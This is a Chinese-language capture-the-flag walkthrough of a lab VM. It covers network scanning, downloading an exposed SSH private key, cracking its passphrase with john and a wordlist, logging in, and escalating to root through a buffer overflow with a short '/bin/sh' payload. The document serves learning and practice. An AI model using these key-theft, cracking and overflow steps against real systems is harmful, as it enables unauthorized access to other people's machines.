CTF實戰(一):SSH-私鑰泄露

ssh-私鑰泄露

靶機地址:https://pan.baidu.com/s/1mLw3yuqardX3f1F0ocPmkQ

1.主機發現

這裏使用了一下二層發現工具netdiscover(netdiscover -r 10.10.3.1/24),發現即使是主動發現也不能準確探測所有足跡,折騰了一段時間,最後還是用nmap的主機發現命令掃除了漏洞機(nmap -sP 10.10.3.0/24

2.服務掃描

這個簡單nmap掃一下就出來了
nmap -sV 10.10.3.102
wyt

3.http服務探測

wyt

1.探測31337端口開放的服務發現需要進行一下目錄掃描
wyt
2.發現了兩個敏感目錄.ssh和robots.txt
wyt
wyt
3.拿到第一個flag,再看第二個.ssh
wyt
4.最後發現http://10.10.3.102:31337/.ssh/id_rsa.pubhttp://10.10.3.102:31337/.ssh/id_rsa可以下載到本地
5.利用私鑰連接服務器
查看用戶名:cat id_rsa.pub
ssh連接:ssh -i id_rsa [email protected]
6.需要輸入密碼,於是想通過john破解密鑰,首先將私鑰轉化爲john可識別的hash文件這裏用到一個工具sshng2john這是一個python腳本https://github.com/truongkma/ctf-tools/blob/master/John/run/sshng2john.py
python sshng2john id_rsa > tmp
7.利用zcat加載字典,利用john破解密鑰
zcat /usr/share/wordlist/rockyou.txt.gz | john --pipe --rules tmp
8.得到密鑰爲starwars,登陸
9.進入root目錄
10.查詢發現有兩個文件
wytflag.txt
11.cat flag.txt發現無權限
12.cat read_message.c 發現第二個flag,同時發現存在緩衝區溢出漏洞
wyt13.20個字節
這裏發現read_message已經被編譯存在於/usr/local/bin目錄下,直接運行
SimonSimonSimonSimon/bin/sh即可提權
wyt
拿下flag3

總結

第一次接觸ctf感覺還是挺有意思的,感覺還有好多東西要學習,方向的話還是覺得對抗和mixed更有趣一點。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章